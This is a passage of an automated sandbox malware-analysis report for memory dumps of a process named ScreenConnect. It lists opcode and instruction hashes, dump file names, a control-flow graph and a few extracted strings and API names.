                                                                  • Opcode ID: 4eb998a85075f52e26c91874ce348b9665ab2e12dc44a227e6bf1b65c68c1d7e
                                                                  • Instruction ID: 053cf66185ff02cdb45bff62438892d4ba7cc5990a22bbb587b379aa3c3b5864
                                                                  • Opcode Fuzzy Hash: 4eb998a85075f52e26c91874ce348b9665ab2e12dc44a227e6bf1b65c68c1d7e
                                                                  • Instruction Fuzzy Hash: 0451C271A1CB588FDB58DF589855BA5BBF0FB5A310F0442AFE44DD3252CB34A845CB82
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cd1bee26c40bf9b906adeff4efc68ec143be13510586950c341f019476dc15cc
                                                                  • Instruction ID: 5b11ea76d97e09c32b9cd07e09c7731f66d2a0ccea1342d0df964bec84ca8648
                                                                  • Opcode Fuzzy Hash: cd1bee26c40bf9b906adeff4efc68ec143be13510586950c341f019476dc15cc
                                                                  • Instruction Fuzzy Hash: 28910A7290C6858FEB51EF2C98A25EA3BB4EF13318F040176C589D7093DE2CBC45AB81

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1010 7ffd343c7d04-7ffd343c7d21 1012 7ffd343c7d56-7ffd343c7d63 1010->1012 1013 7ffd343c7d23-7ffd343c7d40 1010->1013 1014 7ffd343c7d65-7ffd343c7d79 1012->1014 1013->1012 1016 7ffd343c7d80-7ffd343c7d8f 1014->1016 1018 7ffd343c7d95-7ffd343c7da0 1016->1018 1019 7ffd343c7f0c-7ffd343c7f1c 1016->1019 1018->1019 1021 7ffd343c7da6-7ffd343c7db8 1018->1021 1022 7ffd343c7dba-7ffd343c7dd7 1021->1022 1023 7ffd343c7e04-7ffd343c7e29 1021->1023 1026 7ffd343c7f1d-7ffd343c7f90 1022->1026 1027 7ffd343c7ddd-7ffd343c7e02 1022->1027 1027->1023
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8;4$PW;4$`U%4
                                                                  • API String ID: 0-2807619728
                                                                  • Opcode ID: 9b93cdeed4be22baf81dbb901a606d08fb349db21813e1165f73498c2823390a
                                                                  • Instruction ID: eb40009c1756bf1f2ff031ab22125bcd05b4facca575ee0da00095d233da7b44
                                                                  • Opcode Fuzzy Hash: 9b93cdeed4be22baf81dbb901a606d08fb349db21813e1165f73498c2823390a
                                                                  • Instruction Fuzzy Hash: 9D514FA2B5DA8B4FE7A6AB3854A55B57BE1FF53200B0405BBD449C71C3DF296C06C341
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (ZD4$@ZD4
                                                                  • API String ID: 0-1337379809
                                                                  • Opcode ID: 4882486f8af1efb507545c625a8a86df07b6a82433d62be1624f61e897c56972
                                                                  • Instruction ID: ae193e160c684e985e4d03d1e0bf74c51da9bb72018c17d8918c4f7f1e8317a2
                                                                  • Opcode Fuzzy Hash: 4882486f8af1efb507545c625a8a86df07b6a82433d62be1624f61e897c56972
                                                                  • Instruction Fuzzy Hash: E5517271718A4A8FDFD8EF18C8A0AA537A1FF69315B1405ADD519CB292CB39EC02CB41
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B3000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340b3000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: MitigationPolicyProcess
                                                                  • String ID:
                                                                  • API String ID: 1088084561-0
                                                                  • Opcode ID: 1a7c00cad24412b7584d1c5658bc072bb29a8b1e4ab595cf9023b33345998e14
                                                                  • Instruction ID: f0daeebdb0e2d08ef0d0e5571896295fe3c2b4fdb1644cb324c69b654489f803
                                                                  • Opcode Fuzzy Hash: 1a7c00cad24412b7584d1c5658bc072bb29a8b1e4ab595cf9023b33345998e14
                                                                  • Instruction Fuzzy Hash: 7F514931E0CB494FD725ABA89C4A5F97BF0EF56311F04017FE089C3292DE68A8468796
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340D3000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340d3000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: ConnectNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 2191148154-0
                                                                  • Opcode ID: 1cd507a30fb159a67934defac91091c0ae68edcba699c5a9ac1c546b3e0a7c12
                                                                  • Instruction ID: a6212a25c56d836e4481db81beaa85fcbe0a75053c0f6ea16f76cd12f16c13df
                                                                  • Opcode Fuzzy Hash: 1cd507a30fb159a67934defac91091c0ae68edcba699c5a9ac1c546b3e0a7c12
                                                                  • Instruction Fuzzy Hash: 0141E630A08A5C8FDB58EF98D889BE9BBF0FF56310F00426AD44DD7256CB74A845CB81
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $M_^
                                                                  • API String ID: 0-3349595278
                                                                  • Opcode ID: 5a12d2580e30d92347df81925a9cd67e4265c7a27952fa779cbd822be8a15db7
                                                                  • Instruction ID: 8a970e358264b44356efbb6f7e33207837ff52ed7d29d30e11f259fb99acca79
                                                                  • Opcode Fuzzy Hash: 5a12d2580e30d92347df81925a9cd67e4265c7a27952fa779cbd822be8a15db7
                                                                  • Instruction Fuzzy Hash: 8A412B57B0D65986E752B7BCB4B60E93F64DF4622AB4842B7D5CC8D0A3DD081C86C245
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PW;4
                                                                  • API String ID: 0-2663183110
                                                                  • Opcode ID: 4251bad5d9d82dd727f39c5cbafdf3a9cd91e3d237e4c59499c5aba0b0709af6
                                                                  • Instruction ID: 0cbf4d058935769ce8e2ee64a6c3dcfd8b99fff4ed6f8138df277f22d890e335
                                                                  • Opcode Fuzzy Hash: 4251bad5d9d82dd727f39c5cbafdf3a9cd91e3d237e4c59499c5aba0b0709af6
                                                                  • Instruction Fuzzy Hash: EE21E562B68E4B4BDBA6EA2840A56B173D2FF95744B54457AC85DD31C2CF28FC029340
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: VM_H
                                                                  • API String ID: 0-4064549320
                                                                  • Opcode ID: ecb1cc2a25e0d7760844c32988a04934a5f6ca6e8121838a5d867b4c791ec0f2
                                                                  • Instruction ID: a4b04e3db2fc95b64b99f3dbb07a7f2a8d96a704b7e881ec78ef27026d4476bf
                                                                  • Opcode Fuzzy Hash: ecb1cc2a25e0d7760844c32988a04934a5f6ca6e8121838a5d867b4c791ec0f2
                                                                  • Instruction Fuzzy Hash: 58F02483B1DE8A8BE790D52C0CD813633C1DF6A55030402BE94ADD7286EC58EC06A384
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4
                                                                  • API String ID: 0-4088798008
                                                                  • Opcode ID: 68b8b8f538c1cfef91b2c350fcf86dfc372873f464311b57fb5b6a555d928348
                                                                  • Instruction ID: 3eaa1c5748d7dca0fb362773c6732fc44bf815867cac58a3a355bfbd00cd7874
                                                                  • Opcode Fuzzy Hash: 68b8b8f538c1cfef91b2c350fcf86dfc372873f464311b57fb5b6a555d928348
                                                                  • Instruction Fuzzy Hash: BDE092A1A0E1C10FD712CB7898A99E63FA0AF57210B0E41FEE148CB593DA5CA115E715
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8bb1826667ea12e6311447b2e4ca80cdcf6788cda71de85f8f7caf8d1cb38464
                                                                  • Instruction ID: 2b4f7fc8e2c974f6a3a2df1ff2a10a905db02e2b16cea8c53d87a17eb01bac4b
                                                                  • Opcode Fuzzy Hash: 8bb1826667ea12e6311447b2e4ca80cdcf6788cda71de85f8f7caf8d1cb38464
                                                                  • Instruction Fuzzy Hash: D2C10622A4DA4A4BEF95FA2885E14B533E0EF66314B44017AD58EC7583EE28FC46D781
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f97d1d4808d2feb3c1329be7d46a6314a4a9b1b0b97e800243579b55c36a0fc8
                                                                  • Instruction ID: 935227cb7bd00a58bc43d6a49fff695173bebd4f9189fce77842a32a5ae4c410
                                                                  • Opcode Fuzzy Hash: f97d1d4808d2feb3c1329be7d46a6314a4a9b1b0b97e800243579b55c36a0fc8
                                                                  • Instruction Fuzzy Hash: C2C14931B0DA498FEB99DB6CD8E15A837E0EF56310B0501BAD54DCB2D3DE1CAC02AB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e7586a021992ed76c0ce5b7f8c8bb854d03ea2e26bc3d28cdaa6e8a1d0e14b75
                                                                  • Instruction ID: 56eedf7ea8e7181b8c5c429a1ad1cd8e1851fa0b0b881680fa45b09e38ca0f4c
                                                                  • Opcode Fuzzy Hash: e7586a021992ed76c0ce5b7f8c8bb854d03ea2e26bc3d28cdaa6e8a1d0e14b75
                                                                  • Instruction Fuzzy Hash: 7EB11631B1CD4E4FEBA9DB2C84A16B977D1EF99300F0401BED14ED7282DD68E842A784
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0cc598c31ccb0543210623b294f519a291db84dadf6cf683eb529e855eff6daf
                                                                  • Instruction ID: f9c44ff35def2bd7b8849a7acd91ccaec81ad3e230e4bf19fed1b64f76e6e3a3
                                                                  • Opcode Fuzzy Hash: 0cc598c31ccb0543210623b294f519a291db84dadf6cf683eb529e855eff6daf
                                                                  • Instruction Fuzzy Hash: B2B1E471B1CE4A8FDB99EF2888A46A57BE1FF5930474401B9D519D7282DE78EC02DB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ad7aedc5a1fe7b24fe1e6fc5961e889d94b9eee87f99f5f9b9a2a6925075a2f8
                                                                  • Instruction ID: 7e031b16753d6d3843eacd34f16443d82ec335bcac1b51db9fa56f3b3beb0672
                                                                  • Opcode Fuzzy Hash: ad7aedc5a1fe7b24fe1e6fc5961e889d94b9eee87f99f5f9b9a2a6925075a2f8
                                                                  • Instruction Fuzzy Hash: EE91F132B1C9498FEB94EB9C89A567977D1FFA9310B4401BAD54DCB2D2DE19EC02D380
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d20527e066732ca077d6b648c937f7077b6d00bf677aff51ee1090f7ada2986
                                                                  • Instruction ID: d116afcbb0afbdb9ea3b6d2a4da4e06215fa618cf69ddd6d61ba46d96d3269fd
                                                                  • Opcode Fuzzy Hash: 1d20527e066732ca077d6b648c937f7077b6d00bf677aff51ee1090f7ada2986
                                                                  • Instruction Fuzzy Hash: A1A1A271718A4A8FDF98DF68C4A4A6537E1FF6E304B5401ADD959CB292CF35E802DB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1301b415553f1f9d0bf3c48be3bfd172de778d73df7a0c9eee6be1519a7b634b
                                                                  • Instruction ID: e8cc0604d06bc491194e80dc373abcdc90401035f2dbb6c5b11a56461a648bdc
                                                                  • Opcode Fuzzy Hash: 1301b415553f1f9d0bf3c48be3bfd172de778d73df7a0c9eee6be1519a7b634b
                                                                  • Instruction Fuzzy Hash: E8817275708A4A8FDF94EF18C4A0AA673A1FF99304B5445A9D51AC7286CF39E802DB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 393d461340b4eb1d2b9eb99a13c219c07dd88d17cbb3cf34d39164ad92bc9311
                                                                  • Instruction ID: 624e3f6678550002f2fb87544313ac90bf54ee7e3fd715394a35d1855fdc86d8
                                                                  • Opcode Fuzzy Hash: 393d461340b4eb1d2b9eb99a13c219c07dd88d17cbb3cf34d39164ad92bc9311
                                                                  • Instruction Fuzzy Hash: 45610711B4D6A64FEB9ABA6C54F11F93B90DF47314B4841BAD18DCB1E7CD2CAC0A9341
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 645848f8cba3a428fc908d25767417deec3d1e59eb06530c9d5e39fe2466bce9
                                                                  • Instruction ID: 4278b5945100bacf94c0dfff6f2af630a931bf2a5090a5b61641f8efba1cc56a
                                                                  • Opcode Fuzzy Hash: 645848f8cba3a428fc908d25767417deec3d1e59eb06530c9d5e39fe2466bce9
                                                                  • Instruction Fuzzy Hash: 11514873F4DD4A4BEBA9AA6898A50E977E1FF9A311F04017AD15DC3192DF3CAD028341
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e89bde56e96a07de438f2a79912fd7e9ae912f01a934d3a2eb0201344eb9d61a
                                                                  • Instruction ID: 385054313406df3002bad65d9b4381a885ad677d7dc62f2cb9429377450fec0d
                                                                  • Opcode Fuzzy Hash: e89bde56e96a07de438f2a79912fd7e9ae912f01a934d3a2eb0201344eb9d61a
                                                                  • Instruction Fuzzy Hash: D5511372B1CE464BEBA8EA1C94A15B973E1EFA975075402BAD04ED32C7DE1CFC0252C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 71d56cc8efba11057ef43688cc7733f8dae5c831de78c2b422cb31168a7709d0
                                                                  • Instruction ID: 27e85736871381991182f241a23fdfa85f38b599d6fd2dd34f1d21e5ecd5dd71
                                                                  • Opcode Fuzzy Hash: 71d56cc8efba11057ef43688cc7733f8dae5c831de78c2b422cb31168a7709d0
                                                                  • Instruction Fuzzy Hash: 35510631B1CE4E4FDBA5EB1CC4A1AA577E1EFA9340B1441BED04DD7282DD68EC02A780
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7b6aaef3b3e10d78f8047451c80862e68c107e112e6507fdb1c880ac2e2d7169
                                                                  • Instruction ID: 02fd893dc352f1ad734bf7c663672f7ad7a4d4eaecbdb4f34c7e2c1a30e6030a
                                                                  • Opcode Fuzzy Hash: 7b6aaef3b3e10d78f8047451c80862e68c107e112e6507fdb1c880ac2e2d7169
                                                                  • Instruction Fuzzy Hash: DA618F7171DA4A8FDF88DF2888A46A537E1FFA9304B5005A9E45DC72D2CF79E802DB05
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3734ad0e8106bc60a8cd676d694512f7a92135f496139ac6d76176cd4cc37042
                                                                  • Instruction ID: 01b7db7911bd419eebd4676a56e99c2b440aab2c9d3cc1293558dde5b1b82baf
                                                                  • Opcode Fuzzy Hash: 3734ad0e8106bc60a8cd676d694512f7a92135f496139ac6d76176cd4cc37042
                                                                  • Instruction Fuzzy Hash: 7C510072F0DD494FEB98EA2C98A66B873E1EF99344B44007AD54ED32C2DD6CEC029744
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d62accdfee1408f275a060e35bdfa3787f27123ef1d9f89d1d558c0af46170a0
                                                                  • Instruction ID: cd6cd3a8b25b0831f78f38c29923e92904a60880c2ce8900afe10d388cfdfd8b
                                                                  • Opcode Fuzzy Hash: d62accdfee1408f275a060e35bdfa3787f27123ef1d9f89d1d558c0af46170a0
                                                                  • Instruction Fuzzy Hash: 8D518072A0C9494FDFD8EE28C4A5AA573E1FF69314B0404A9D45EDB296DE39EC02C780
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 063490cff50cd747978b59cb6cb9c316903203314c6d5b346ebb6cbf342c9e95
                                                                  • Instruction ID: 1a429c1028ca732f8ddf36577f194564103de87a1b665319946f7426de7bcbf0
                                                                  • Opcode Fuzzy Hash: 063490cff50cd747978b59cb6cb9c316903203314c6d5b346ebb6cbf342c9e95
                                                                  • Instruction Fuzzy Hash: 4B410632B1CE1D8FEFA4DA98A9D51B973D2EF99355B00017BD50DD7281DE28AC06E780
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c113cca02d0eb0aa4e4997e20bdd805cc285c92727435a357b74d482c34da1d1
                                                                  • Instruction ID: e64e85a88371c258fe731f6dc801fc073b69ad50c3bd4f199e97da177fba8779
                                                                  • Opcode Fuzzy Hash: c113cca02d0eb0aa4e4997e20bdd805cc285c92727435a357b74d482c34da1d1
                                                                  • Instruction Fuzzy Hash: 8C51717571CA8A8FDFC8DF28C4A46A537A1FF69304B5405ADD51ACB292CE39E802DB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4ec1bb09fd0156b0d3a2ee7f18d1160bc20570f9a7d50225c33dfbeaf3a515ce
                                                                  • Instruction ID: 8aa82f978dc79320229a993a97f475be86e905d886a8c565cf3db7bc870abf17
                                                                  • Opcode Fuzzy Hash: 4ec1bb09fd0156b0d3a2ee7f18d1160bc20570f9a7d50225c33dfbeaf3a515ce
                                                                  • Instruction Fuzzy Hash: E551D772F0DD4E4FEB98DA1C58A56A877D1EF96310F0401BFD15DD7282CD68AC42A381
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d5d2931278d83b1de63283a49010fb4b97e58e6986f8d5761e9578829a53240
                                                                  • Instruction ID: 93712cdcd79ff310d7cdf21e705bf653f94b09a76bd6d84ab78673724e05c88f
                                                                  • Opcode Fuzzy Hash: 1d5d2931278d83b1de63283a49010fb4b97e58e6986f8d5761e9578829a53240
                                                                  • Instruction Fuzzy Hash: 28412921B1C98A0FE7AAA73884B55B97BE1EF56300B1801BAD44DC31D3DE2CB806E341
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e06fda30309e5078276543f80e01fdfaad62f554103fa7dc5f3e3909ff497626
                                                                  • Instruction ID: 154ce6de98862446bc0f037527b0983c908109b31a6725e6103d6644f6971d27
                                                                  • Opcode Fuzzy Hash: e06fda30309e5078276543f80e01fdfaad62f554103fa7dc5f3e3909ff497626
                                                                  • Instruction Fuzzy Hash: 8741E472B18D4A8FEB98EB5CD4A64B873D1FF59300754417AE55ED3282DE28F84293C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a9c6da53672dad96d5c85e62e590997d50704638cd648929290e1989c15de367
                                                                  • Instruction ID: e144b85203e9d57597800988d9bcaf5587dd3af511f7508df87b043fbec713ed
                                                                  • Opcode Fuzzy Hash: a9c6da53672dad96d5c85e62e590997d50704638cd648929290e1989c15de367
                                                                  • Instruction Fuzzy Hash: DB419872F0DD5E4FEB98DB1C94616A8B7E1EF99300F0401BED55DD7282CE689C429741
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0fdecb2fee28b907f651c10713df1023f195461be5cb90c5d219bf03f22af046
                                                                  • Instruction ID: 949d997130bbebc4a8b61dbbb67281ab6c1b6a9616ac429ac618979ca6b4b82a
                                                                  • Opcode Fuzzy Hash: 0fdecb2fee28b907f651c10713df1023f195461be5cb90c5d219bf03f22af046
                                                                  • Instruction Fuzzy Hash: C1412671B0DA0C8FEF54DB68D4A55A97BE0EF9A301B08007BD149DB192DE289C059F41
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 546c573cc0edadc0c5acf9ac2315cd8e4a4c4d82f46251c806e39becbdd14737
                                                                  • Instruction ID: 7acdcf297a9213bc0a92526289774c5de2c54462327c4709bded89bdcdb2b850
                                                                  • Opcode Fuzzy Hash: 546c573cc0edadc0c5acf9ac2315cd8e4a4c4d82f46251c806e39becbdd14737
                                                                  • Instruction Fuzzy Hash: D24182307189498FDB98EF2CC4A4E6677E1FF6930075441A9D05ACB2E6DE28FC42DB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
